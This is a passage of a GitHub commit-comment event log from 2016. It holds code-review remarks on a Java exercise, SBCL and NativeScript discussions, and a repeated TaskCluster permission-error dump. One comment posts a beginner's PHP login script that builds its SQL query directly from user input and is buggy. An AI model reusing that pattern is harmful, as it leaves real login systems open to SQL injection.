{"id":"4628100199","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"jonathanwss/crescer-2016-2"},"payload":{"comment":{"id":19201119,"position":5,"line":48,"path":"src/modulo-01-java-OO/modulo-01/Elfo.java","commit_id":"55a7c8e81b21d49f2bcc1c97f9609dc789738fb0","created_at":"2016-09-28T02:16:20Z","updated_at":"2016-09-28T02:16:20Z","body":"Cliente pediu que seja possível caçar anões, correto. Mas faremos isto através do método atirarFlecha."}},"created_at":"2016-09-28T02:16:20Z"}
{"id":"4628100743","type":"CommitCommentEvent","actor":{"login":"mjreed-turner"},"repo":{"name":"sbcl/sbcl"},"payload":{"comment":{"id":19201122,"position":null,"line":null,"path":null,"commit_id":"a10fd4e2674f0bc1bf8be0848d54f53bfa12680e","created_at":"2016-09-28T02:16:32Z","updated_at":"2016-09-28T02:16:32Z","body":"OK, so what is the not-\"bad idea\" to allow sbcl to work in the face of ASLR?"}},"created_at":"2016-09-28T02:16:32Z"}
{"id":"4628104132","type":"CommitCommentEvent","actor":{"login":"alanruttenberg"},"repo":{"name":"slime/slime"},"payload":{"comment":{"id":19201129,"position":null,"line":null,"path":null,"commit_id":"43848fb003fa520e66018b91e350f312fce0aae7","created_at":"2016-09-28T02:17:51Z","updated_at":"2016-09-28T02:17:51Z","body":"Bit confusing about what should or should not be working. I'll have to have a closer look. I'll test it on MCL as well to see whether behavior there is different. Probably review the file history to try to understand the approach."}},"created_at":"2016-09-28T02:17:51Z"}
{"id":"4628106220","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"jonathanwss/crescer-2016-2"},"payload":{"comment":{"id":19201135,"position":20,"line":62,"path":"src/modulo-01-java-OO/modulo-01/ElfoTest.java","commit_id":"26cbfc0b6afabd5cfe560c864cf7b0094af04083","created_at":"2016-09-28T02:18:37Z","updated_at":"2016-09-28T02:18:37Z","body":"O cliente não pediu que isso fosse feito desta forma."}},"created_at":"2016-09-28T02:18:37Z"}
{"id":"4628107542","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"jonathanwss/crescer-2016-2"},"payload":{"comment":{"id":19201140,"position":5,"line":9,"path":"src/modulo-01-java-OO/modulo-01/CestoDeLembas.java","commit_id":"26cbfc0b6afabd5cfe560c864cf7b0094af04083","created_at":"2016-09-28T02:19:06Z","updated_at":"2016-09-28T02:19:06Z","body":"é possível retornar direto:\r\n\r\n```Java\r\nreturn quantidade%2==0&&quantidade!=2&&quantidade>=1&&quantidade<=100;\r\n```"}},"created_at":"2016-09-28T02:19:06Z"}
{"id":"4628109418","type":"CommitCommentEvent","actor":{"login":"tbfleming"},"repo":{"name":"openhardwarecoza/LaserWeb4"},"payload":{"comment":{"id":19201145,"position":null,"line":null,"path":null,"commit_id":"4c7fdef36f85b389dfd296f67f563c568ea9180c","created_at":"2016-09-28T02:19:51Z","updated_at":"2016-09-28T02:19:51Z","body":"If it moves to React, then this should help: https://react-bootstrap.github.io"}},"created_at":"2016-09-28T02:19:51Z"}
{"id":"4628111173","type":"CommitCommentEvent","actor":{"login":"eliseudaroitjr"},"repo":{"name":"eliseudaroitjr/crescer-2016-2"},"payload":{"comment":{"id":19201146,"position":14,"line":14,"path":"src/modulo-01-java-OO/projeto-lotr/Dwarf.java","commit_id":"35aaacf420d1d0a1b80635a36736760c4b805c83","created_at":"2016-09-28T02:20:26Z","updated_at":"2016-09-28T02:20:26Z","body":"Na hora que ele perde vida com a flecha, preciso de um set para mexer no encapsulamento, não?"}},"created_at":"2016-09-28T02:20:26Z"}
{"id":"4628114850","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"jonathanwss/crescer-2016-2"},"payload":{"comment":{"id":19201151,"position":13,"line":68,"path":"src/modulo-01-java-OO/modulo-01/ElfoTest.java","commit_id":"2f4b3fa7391b537dff5c3a6e5cdb1db682178f47","created_at":"2016-09-28T02:21:47Z","updated_at":"2016-09-28T02:21:47Z","body":"Isso não foi solicitado pelo cliente. Nada de números aleatórios."}},"created_at":"2016-09-28T02:21:47Z"}
{"id":"4628115390","type":"CommitCommentEvent","actor":{"login":"mnahkies"},"repo":{"name":"NativeScript/NativeScript"},"payload":{"comment":{"id":19201152,"position":5,"line":243,"path":"tns-core-modules/ui/search-bar/search-bar.ios.ts","commit_id":"adf77afbd468df8a3bce7368dfa38b98ad9c2f02","created_at":"2016-09-28T02:21:58Z","updated_at":"2016-09-28T02:21:58Z","body":"@hamorphis could you please explain this change and how it relates to the non-uniform border support?\r\n\r\nThis change breaks the ability to customise the background colour of the search bar on iOS. I was previously using this like so:\r\n\r\n`\r\n\t\t<SearchBar row=\"0\" col=\"0\"\r\n\t\t\t\t\t   id=\"searchBar\"\r\n\t\t\t\t\t   height=\"60\"\r\n\t\t\t\t\t   width=\"100%\"\r\n\t\t\t\t\t   ios:backgroundColor=\"#E3E5E9\"\r\n\t\t\t\t\t   hint=\"{{ title }}\"\r\n\t\t\t\t\t   text=\"{{ value }}\"/>\r\n`"}},"created_at":"2016-09-28T02:21:58Z"}
{"id":"4628115722","type":"CommitCommentEvent","actor":{"login":"Obihoernchen"},"repo":{"name":"brusselopole/Worldopole"},"payload":{"comment":{"id":19201153,"position":null,"line":null,"path":null,"commit_id":"892e7b0ca9145d82dbb1ade93fab40ec5ca25c24","created_at":"2016-09-28T02:22:06Z","updated_at":"2016-09-28T02:22:06Z","body":"Ups I failed. Will revert this "}},"created_at":"2016-09-28T02:22:06Z"}
{"id":"4628116775","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"jonathanwss/crescer-2016-2"},"payload":{"comment":{"id":19201158,"position":32,"line":87,"path":"src/modulo-01-java-OO/modulo-01/ElfoTest.java","commit_id":"2f4b3fa7391b537dff5c3a6e5cdb1db682178f47","created_at":"2016-09-28T02:22:27Z","updated_at":"2016-09-28T02:22:27Z","body":"Cliente não pediu para informar a quantidade de flechas a serem atiradas. Retirar isto."}},"created_at":"2016-09-28T02:22:27Z"}
{"id":"4628118128","type":"CommitCommentEvent","actor":{"login":"bernardobrezende"},"repo":{"name":"jonathanwss/crescer-2016-2"},"payload":{"comment":{"id":19201161,"position":null,"line":null,"path":null,"commit_id":"2f4b3fa7391b537dff5c3a6e5cdb1db682178f47","created_at":"2016-09-28T02:22:57Z","updated_at":"2016-09-28T02:22:57Z","body":"@jonathanwss \r\n\r\nCuidado para não fazer coisas que o cliente não pediu. Isto só pode complicar as coisas. Releia os exercícios e faça exatamente o que eles pedem."}},"created_at":"2016-09-28T02:22:57Z"}
{"id":"4628119650","type":"CommitCommentEvent","actor":{"login":"SimonOrJ"},"repo":{"name":"bontrose/s4xbot"},"payload":{"comment":{"id":19201164,"position":11,"line":26,"path":"s4xb0t.py","commit_id":"f84edc7896fbfcd39da3aeb807963cb35e83cdf0","created_at":"2016-09-28T02:23:29Z","updated_at":"2016-09-28T02:23:29Z","body":"I think that should be \"ex: !d2, !d6, !d20\""}},"created_at":"2016-09-28T02:23:29Z"}
{"id":"4628121116","type":"CommitCommentEvent","actor":{"login":"jhorber95"},"repo":{"name":"prinick96/OcrendBB"},"payload":{"comment":{"id":19201166,"position":null,"line":null,"path":null,"commit_id":"ca32c5001d70e33c74ee27a8d6291d69bb2cc761","created_at":"2016-09-28T02:24:02Z","updated_at":"2016-09-28T02:24:02Z","body":"Tengo un problema al iniciar sesion, estos son los errores: \r\n\r\n \r\n\r\nNotice: Undefined property: Conexion::$asdf in /var/www/html/cursoMVC_php/core/bin/ajax/goLogin.php on line 7\r\n\r\nWarning: mysqli::query(): invalid object or resource Conexion in /var/www/html/cursoMVC_php/core/bin/ajax/goLogin.php on line 9\r\n\r\nNotice: Undefined variable: query in /var/www/html/cursoMVC_php/core/bin/ajax/goLogin.php on line 11\r\n\r\nWarning: mysql_num_rows() expects parameter 1 to be resource, null given in /var/www/html/cursoMVC_php/core/models/class.Conexion.php on line 13\r\n\r\nmas sin embargo tengo todos los archivos como en el tutorial.\r\n\r\n`<?php\r\n\t\r\n\tif (!empty($_POST['user']) && !empty($_POST['pass'])) {\r\n\t\t\r\n\r\n\t $db = new Conexion();\r\n\t $data = $db->$_POST['user'];\r\n\t $pass =  Encrypt($_POST['pass']);\r\n\t $sql = $db->query(\"SELECT usu_codigo FROM usuario WHERE (usu_email ='$data' OR usu_usuario='$data'  ) AND usu_password = '$pass' LIMIT 1\");\r\n\r\n\t if ($db->rows($query)>0) {\r\n\t \t \r\n\t \t if($_POST['sesion']) { ini_set('session.cookie_lifetime', time() + (60*60*24)); }\r\n    \t \r\n    \t $_SESSION['app_id'] = $db->recorrer($sql)[0];\r\n\t     echo 1;\r\n\t \t\r\n\t }else{\r\n\t \techo '<div class=\"alert alert-dismissible alert-danger\">\r\n  \t\t\t\t<button type=\"button\" class=\"close\" data-dismiss=\"alert\">&times;</button>\r\n  \t\t\t\t<strong>Error: </strong> Usuario o contraseña incorrecta</div>';\r\n\t }\r\n\r\n\t $db->close();\r\n\t}else{\r\n\t\techo '<div class=\"alert alert-dismissible alert-danger\">\r\n  \t\t\t\t<button type=\"button\" class=\"close\" data-dismiss=\"alert\">&times;</button>\r\n  \t\t\t\t<strong>Error: </strong>Todos los datos son obligatorios</div>';\r\n\r\n\t}\r\n?>`\r\n"}},"created_at":"2016-09-28T02:24:02Z"}
{"id":"4628129902","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"mozilla-bteam/bmo"},"payload":{"comment":{"id":19201177,"position":null,"line":null,"path":null,"commit_id":"4250271527caadb3eefd54ccf068f610f5d93a46","created_at":"2016-09-28T02:27:09Z","updated_at":"2016-09-28T02:27:09Z","body":"Submitting the task to TaskCluster failed. You didn't give the task-graph scopes allowing it define tasks on the queue.Details:\n\n```js\n[\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-bteam/bmo:branch:development\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n  \\\"queue:route:gaia-taskcluster\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"AkUIfYonTfW6mwq1C-QftQ\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.email.dylan@hardison.net.on-any\\\",\\n    \\\"notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"notify.irc-channel.#bteam.on-exception\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.opened\\\",\\n        \\\"pull_request.synchronize\\\",\\n        \\\"pull_request.reopened\\\",\\n        \\\"push\\\"\\n      ]\\n    },\\n    \\\"treeherder\\\": {\\n      \\\"symbol\\\": \\\"San\\\",\\n      \\\"machine\\\": {\\n        \\\"platform\\\": \\\"linux64\\\",\\n        \\\"build\\\": {\\n          \\\"platform\\\": \\\"linux64\\\"\\n        }\\n      }\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 3600,\\n    \\\"reruns\\\": 3,\\n    \\\"image\\\": \\\"mozillabteam/bmo-ci\\\",\\n    \\\"command\\\": [\\n      \\\"runtests.sh\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"TEST_SUITE\\\": \\\"sanity\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"93826b5e5289cef8b6b15ba630fe522d236e9933\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"dylanwh\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"4250271527caadb3eefd54ccf068f610f5d93a46\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"dylan@hardison.net\\\"\\n    },\\n    \\\"artifacts\\\": {\\n      \\\"public/runtests_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/runtests.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      }\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"Basic Sanity Tests\\\",\\n    \\\"description\\\": \\\"Basic Sanity Tests\\\",\\n    \\\"owner\\\": \\\"dylan@hardison.net\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-28T02:27:09.182Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-29T02:27:09.182Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"P87ZtGjRRxufUD3r4XjvIw\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-29T02:27:09.182Z\\\"\\n}\\n  time:     2016-09-28T02:27:09.289Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-bteam/bmo:branch:development\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n    \\\"queue:route:gaia-taskcluster\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n        \"error\": {\n            \"code\": \"InsufficientScopes\",\n            \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-bteam/bmo:branch:development\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n  \\\"queue:route:gaia-taskcluster\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   {\\\"taskId\\\":\\\"AkUIfYonTfW6mwq1C-QftQ\\\"}\\n  payload:  {\\n  \\\"provisionerId\\\": \\\"aws-provisioner-v1\\\",\\n  \\\"workerType\\\": \\\"github-worker\\\",\\n  \\\"routes\\\": [\\n    \\\"notify.email.dylan@hardison.net.on-any\\\",\\n    \\\"notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"notify.irc-channel.#bteam.on-exception\\\"\\n  ],\\n  \\\"extra\\\": {\\n    \\\"github\\\": {\\n      \\\"env\\\": true,\\n      \\\"events\\\": [\\n        \\\"pull_request.opened\\\",\\n        \\\"pull_request.synchronize\\\",\\n        \\\"pull_request.reopened\\\",\\n        \\\"push\\\"\\n      ]\\n    },\\n    \\\"treeherder\\\": {\\n      \\\"symbol\\\": \\\"San\\\",\\n      \\\"machine\\\": {\\n        \\\"platform\\\": \\\"linux64\\\",\\n        \\\"build\\\": {\\n          \\\"platform\\\": \\\"linux64\\\"\\n        }\\n      }\\n    }\\n  },\\n  \\\"payload\\\": {\\n    \\\"maxRunTime\\\": 3600,\\n    \\\"reruns\\\": 3,\\n    \\\"image\\\": \\\"mozillabteam/bmo-ci\\\",\\n    \\\"command\\\": [\\n      \\\"runtests.sh\\\"\\n    ],\\n    \\\"env\\\": {\\n      \\\"TEST_SUITE\\\": \\\"sanity\\\",\\n      \\\"GITHUB_EVENT\\\": \\\"push\\\",\\n      \\\"GITHUB_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_BASE_SHA\\\": \\\"93826b5e5289cef8b6b15ba630fe522d236e9933\\\",\\n      \\\"GITHUB_BASE_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_REPO_URL\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\",\\n      \\\"GITHUB_HEAD_USER\\\": \\\"dylanwh\\\",\\n      \\\"GITHUB_HEAD_SHA\\\": \\\"4250271527caadb3eefd54ccf068f610f5d93a46\\\",\\n      \\\"GITHUB_HEAD_BRANCH\\\": \\\"development\\\",\\n      \\\"GITHUB_HEAD_USER_EMAIL\\\": \\\"dylan@hardison.net\\\"\\n    },\\n    \\\"artifacts\\\": {\\n      \\\"public/runtests_log\\\": {\\n        \\\"type\\\": \\\"file\\\",\\n        \\\"path\\\": \\\"/var/log/runtests.log\\\",\\n        \\\"expires\\\": \\\"2018-02-17T17:33:38.806Z\\\"\\n      }\\n    }\\n  },\\n  \\\"metadata\\\": {\\n    \\\"name\\\": \\\"Basic Sanity Tests\\\",\\n    \\\"description\\\": \\\"Basic Sanity Tests\\\",\\n    \\\"owner\\\": \\\"dylan@hardison.net\\\",\\n    \\\"source\\\": \\\"https://github.com/mozilla-bteam/bmo.git\\\"\\n  },\\n  \\\"created\\\": \\\"2016-09-28T02:27:09.182Z\\\",\\n  \\\"deadline\\\": \\\"2016-09-29T02:27:09.182Z\\\",\\n  \\\"schedulerId\\\": \\\"task-graph-scheduler\\\",\\n  \\\"taskGroupId\\\": \\\"P87ZtGjRRxufUD3r4XjvIw\\\",\\n  \\\"dependencies\\\": [],\\n  \\\"requires\\\": \\\"all-completed\\\",\\n  \\\"priority\\\": \\\"normal\\\",\\n  \\\"retries\\\": 5,\\n  \\\"scopes\\\": [],\\n  \\\"tags\\\": {},\\n  \\\"expires\\\": \\\"2017-09-29T02:27:09.182Z\\\"\\n}\\n  time:     2016-09-28T02:27:09.289Z\\ndetails:\\n{\\n  \\\"scopesets\\\": [\\n    [\\n      \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n      \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n    ]\\n  ],\\n  \\\"scopes\\\": [\\n    \\\"assume:repo:github.com/mozilla-bteam/bmo:branch:development\\\",\\n    \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n    \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n    \\\"queue:route:gaia-taskcluster\\\",\\n    \\\"queue:route:index.garbage.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n    \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n    \\\"secrets:get:garbage/*\\\",\\n    \\\"secrets:set:garbage/*\\\"\\n  ]\\n}\",\n            \"requestInfo\": {\n                \"method\": \"defineTask\",\n                \"params\": {\n                    \"taskId\": \"AkUIfYonTfW6mwq1C-QftQ\"\n                },\n                \"payload\": {\n                    \"provisionerId\": \"aws-provisioner-v1\",\n                    \"workerType\": \"github-worker\",\n                    \"routes\": [\n                        \"notify.email.dylan@hardison.net.on-any\",\n                        \"notify.irc-channel.#bteam.on-failed\",\n                        \"notify.irc-channel.#bteam.on-exception\"\n                    ],\n                    \"extra\": {\n                        \"github\": {\n                            \"env\": true,\n                            \"events\": [\n                                \"pull_request.opened\",\n                                \"pull_request.synchronize\",\n                                \"pull_request.reopened\",\n                                \"push\"\n                            ]\n                        },\n                        \"treeherder\": {\n                            \"symbol\": \"San\",\n                            \"machine\": {\n                                \"platform\": \"linux64\",\n                                \"build\": {\n                                    \"platform\": \"linux64\"\n                                }\n                            }\n                        }\n                    },\n                    \"payload\": {\n                        \"maxRunTime\": 3600,\n                        \"reruns\": 3,\n                        \"image\": \"mozillabteam/bmo-ci\",\n                        \"command\": [\n                            \"runtests.sh\"\n                        ],\n                        \"env\": {\n                            \"TEST_SUITE\": \"sanity\",\n                            \"GITHUB_EVENT\": \"push\",\n                            \"GITHUB_BRANCH\": \"development\",\n                            \"GITHUB_BASE_SHA\": \"93826b5e5289cef8b6b15ba630fe522d236e9933\",\n                            \"GITHUB_BASE_BRANCH\": \"development\",\n                            \"GITHUB_HEAD_REPO_URL\": \"https://github.com/mozilla-bteam/bmo.git\",\n                            \"GITHUB_HEAD_USER\": \"dylanwh\",\n                            \"GITHUB_HEAD_SHA\": \"4250271527caadb3eefd54ccf068f610f5d93a46\",\n                            \"GITHUB_HEAD_BRANCH\": \"development\",\n                            \"GITHUB_HEAD_USER_EMAIL\": \"dylan@hardison.net\"\n                        },\n                        \"artifacts\": {\n                            \"public/runtests_log\": {\n                                \"type\": \"file\",\n                                \"path\": \"/var/log/runtests.log\",\n                                \"expires\": \"2018-02-17T17:33:38.806Z\"\n                            }\n                        }\n                    },\n                    \"metadata\": {\n                        \"name\": \"Basic Sanity Tests\",\n                        \"description\": \"Basic Sanity Tests\",\n                        \"owner\": \"dylan@hardison.net\",\n                        \"source\": \"https://github.com/mozilla-bteam/bmo.git\"\n                    },\n                    \"created\": \"2016-09-28T02:27:09.182Z\",\n                    \"deadline\": \"2016-09-29T02:27:09.182Z\",\n                    \"schedulerId\": \"task-graph-scheduler\",\n                    \"taskGroupId\": \"P87ZtGjRRxufUD3r4XjvIw\",\n                    \"dependencies\": [],\n                    \"requires\": \"all-completed\",\n                    \"priority\": \"normal\",\n                    \"retries\": 5,\n                    \"scopes\": [],\n                    \"tags\": {},\n                    \"expires\": \"2017-09-29T02:27:09.182Z\"\n                },\n                \"time\": \"2016-09-28T02:27:09.289Z\"\n            },\n            \"details\": {\n                \"scopesets\": [\n                    [\n                        \"queue:route:notify.email.dylan@hardison.net.on-any\",\n                        \"queue:route:notify.irc-channel.#bteam.on-failed\",\n                        \"queue:route:notify.irc-channel.#bteam.on-exception\"\n                    ]\n                ],\n                \"scopes\": [\n                    \"assume:repo:github.com/mozilla-bteam/bmo:branch:development\",\n                    \"queue:create-task:aws-provisioner-v1/github-worker\",\n                    \"queue:define-task:aws-provisioner-v1/b2gtest\",\n                    \"queue:route:gaia-taskcluster\",\n                    \"queue:route:index.garbage.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\",\n                    \"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\",\n                    \"queue:route:tc-treeherder.bmo-development.*\",\n                    \"queue:route:tc-treeherder.bmo-master.*\",\n                    \"queue:route:tc-treeherder.bmo-upstream-merge.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\",\n                    \"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\",\n                    \"secrets:get:garbage/*\",\n                    \"secrets:set:garbage/*\"\n                ]\n            }\n        }\n    },\n    {\n        \"message\": \"You do not have sufficient scopes. This request requires you\\nto have one of the following sets of scopes:\\n[\\n  [\\n    \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\",\\n    \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n  ]\\n]\\n\\nYou only have the scopes:\\n[\\n  \\\"assume:repo:github.com/mozilla-bteam/bmo:branch:development\\\",\\n  \\\"queue:create-task:aws-provisioner-v1/github-worker\\\",\\n  \\\"queue:define-task:aws-provisioner-v1/b2gtest\\\",\\n  \\\"queue:route:gaia-taskcluster\\\",\\n  \\\"queue:route:index.garbage.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder-stage.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.bmo-upstream-merge.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-development.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-master.*\\\",\\n  \\\"queue:route:tc-treeherder.v2.mozilla-bteam/bmo-upstream-merge.*\\\",\\n  \\\"secrets:get:garbage/*\\\",\\n  \\\"secrets:set:garbage/*\\\"\\n]\\n\\nIn other words you are missing scopes from one of the options:\\n * Option 0:\\n    - \\\"queue:route:notify.email.dylan@hardison.net.on-any\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-failed\\\", and\\n    - \\\"queue:route:notify.irc-channel.#bteam.on-exception\\\"\\n----\\nerrorCode:  InsufficientScopes\\nstatusCode: 403\\nrequestInfo:\\n  method:   defineTask\\n  params:   